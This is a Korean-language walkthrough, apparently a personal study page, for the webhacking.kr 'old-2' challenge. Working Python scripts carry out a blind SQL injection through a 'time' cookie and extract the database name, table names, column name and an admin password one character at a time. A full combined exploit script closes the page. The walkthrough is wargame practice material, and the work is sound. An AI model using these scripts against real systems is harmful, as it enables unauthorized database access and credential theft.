#️⃣

OLD-2

현재 시간 값이 적힌다. 이게 이제 값을 넣어주게 되면 sql query로 실행 결과값이 초에 나타난다.
import requests import os os.system("cls") print("------------AUTO EXPLOIT------------") URL = "https://webhacking.kr/challenge/web-02/" #cookie = {"PHPSESSID": "<--REDACTED-->"} flag = "" for i in range(1,2): print("LOOKING FOR LENGTH : "+str(i)) pay = "(select length(group_concat(database())))" cookie = { "PHPSESSID": "<--REDACTED-->", "time": pay } res = requests.get(url=URL,cookies=cookie) #false if "<script>location.href='./';</script>" in res.text: continue #true else: print(res.text) length = i #break
Python
db이름이 6자리니까 6개가 나오는 것이다.
#word flag = "" length = 6 for i in range(1,length+1): print("FINDING PW of : "+str(i)) for k in range(48,90): print("SEARCHING : "+chr(k),end="\r") pay = "(select substr(group_concat(database()),"+str(i)+",1))="+str(hex(k)) cookie = { "PHPSESSID": "<--REDACTED-->", "time": pay } res = requests.get(url=URL,cookies=cookie) if "2070-01-01 09:00:00" in res.text: continue elif "2070-01-01 09:00:01" in res.text: flag +=chr(k) print() print(flag) break else: print("PW NOT FOUND") exit()
Python
DB이름을 알아냈다 : chall2
이제 테이블 이름을 알아보자
#length for i in range(1,2): print("LOOKING FOR LENGTH : "+str(i))\ #find table name length pay = "((SELECT length(group_concat(table_name)) FROM information_schema.tables WHERE table_schema='chall2')" cookie = { "PHPSESSID": "<--REDACTED-->", "time": pay } res = requests.get(url=URL,cookies=cookie) print(res.text)
Python
테이블 이름 길이도 17이다. 근데 내부에 이름이 2개 들어있어서,,,확인이 필요하다.
#word flag = "" length = 17 for i in range(1,length+1): print("FINDING PW of : "+str(i)) for k in range(48,128): print("SEARCHING : "+chr(k),end="\r") #find db name #find table name #pay = "(select substr(group_concat(database()),"+str(i)+",1))="+str(hex(k)) pay = "(SELECT substr(group_concat(table_name),"+str(i)+",1) FROM information_schema.tables WHERE table_schema='chall2')="+str(hex(k)) cookie = { "PHPSESSID": "<--REDACTED-->", "time": pay } res = requests.get(url=URL,cookies=cookie) if "2070-01-01 09:00:00" in res.text: continue elif "2070-01-01 09:00:01" in res.text: flag +=chr(k) print() print(flag) break else: flag += "?" print() print(flag) continue
Python
두개의 값이 있는데, ADMIN_AREA_PW에 값이 들어있겠다.
이제 저걸 알아보자 테이블 안에 레코드가 몇 개 있는지
for i in range(1,2): print("LOOKING FOR LENGTH : "+str(i)) pay = "(SELECT count(*) FROM admin_area_pw)" cookie = { "PHPSESSID": "<--REDACTED-->", "time": pay } res = requests.get(url=URL,cookies=cookie) print(res.text)
Python
1개 있다. 그럼 바로 컬럼 이름들을 알아보자.
flag = "" length = 2 for i in range(1,length+1): print("FINDING PW of : "+str(i)) for k in range(32,128): print("SEARCHING : "+chr(k),end="\r") #find column name pay = "(SELECT substr(group_concat(column_name),"+str(i)+",1) FROM information_schema.columns WHERE table_name='admin_area_pw')="+str(hex(k)) cookie = { "PHPSESSID": "<--REDACTED-->", "time": pay } res = requests.get(url=URL,cookies=cookie) if "2070-01-01 09:00:00" in res.text: continue elif "2070-01-01 09:00:01" in res.text: flag +=chr(k) print() print(flag) break else: flag += "?" print() print(flag) continue
Python
거의다 왔다.
pw 인자값 개수 확인하고, 길이 출력
for i in range(1,2): print("LOOKING FOR LENGTH : "+str(i)) #find flag pay = "(SELECT length(group_concat(pw)) FROM admin_area_pw)" cookie = { "PHPSESSID": "<--REDACTED-->", "time": pay } res = requests.get(url=URL,cookies=cookie) print(res.text)
Python
값 찾자
flag = "" length = 17 for i in range(1,length+1): print("FINDING PW of : "+str(i)) for k in range(32,128): print("SEARCHING : "+chr(k),end="\r") pay = "(SELECT substr(group_concat(pw),"+str(i)+",1) FROM admin_area_pw)="+str(hex(k)) cookie = { "PHPSESSID": "<--REDACTED-->", "time": pay } res = requests.get(url=URL,cookies=cookie) if "2070-01-01 09:00:00" in res.text: continue elif "2070-01-01 09:00:01" in res.text: flag +=chr(k) print() print(flag) break else: flag += "?" print() print(flag) continue
Python

전체 코드

import requests import os os.system("cls") print("------------AUTO EXPLOIT------------") URL = "https://webhacking.kr/challenge/web-02/" #cookie = {"PHPSESSID": "<--REDACTED-->"} #length # for i in range(1,2): # print("LOOKING FOR LENGTH : "+str(i)) # #find db name length # #pay = "(select length(group_concat(database())))" # #find table name length # #pay = "(SELECT length(group_concat(table_name)) FROM information_schema.tables WHERE table_schema='chall2')" # #find sth # #pay = "(SELECT length(column_name) FROM information_schema.columns WHERE table_name='admin_area_pw')" # #find flag # pay = "(SELECT length(group_concat(pw)) FROM admin_area_pw)" # cookie = { # "PHPSESSID": "<------redacted--------->", # "time": pay # } # res = requests.get(url=URL,cookies=cookie) # print(res.text) #word flag = "" length = 17 for i in range(1,length+1): print("FINDING PW of : "+str(i)) for k in range(32,128): print("SEARCHING : "+chr(k),end="\r") #find db name #pay = "(select substr(group_concat(database()),"+str(i)+",1))="+str(hex(k)) #find table name #pay = "(SELECT substr(group_concat(table_name),"+str(i)+",1) FROM information_schema.tables WHERE table_schema='chall2')="+str(hex(k)) #find column name #pay = "(SELECT substr(group_concat(column_name),"+str(i)+",1) FROM information_schema.columns WHERE table_name='admin_area_pw')="+str(hex(k)) #find pw pay = "(SELECT substr(group_concat(pw),"+str(i)+",1) FROM admin_area_pw)="+str(hex(k)) cookie = { "PHPSESSID": "<------redacted--------->", "time": pay } res = requests.get(url=URL,cookies=cookie) if "2070-01-01 09:00:00" in res.text: continue elif "2070-01-01 09:00:01" in res.text: flag +=chr(k) print() print(flag) break else: flag += "?" print() print(flag) continue
Python